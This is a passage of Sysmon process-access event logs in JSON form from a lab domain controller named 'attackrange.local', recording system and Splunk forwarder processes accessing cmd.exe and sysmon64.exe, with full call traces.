Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010F39C0500}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3679,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.736\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010F39C0500}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.736","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010F39C0500}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3680,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3681,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3682,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3683,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3684,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3685,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3686,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
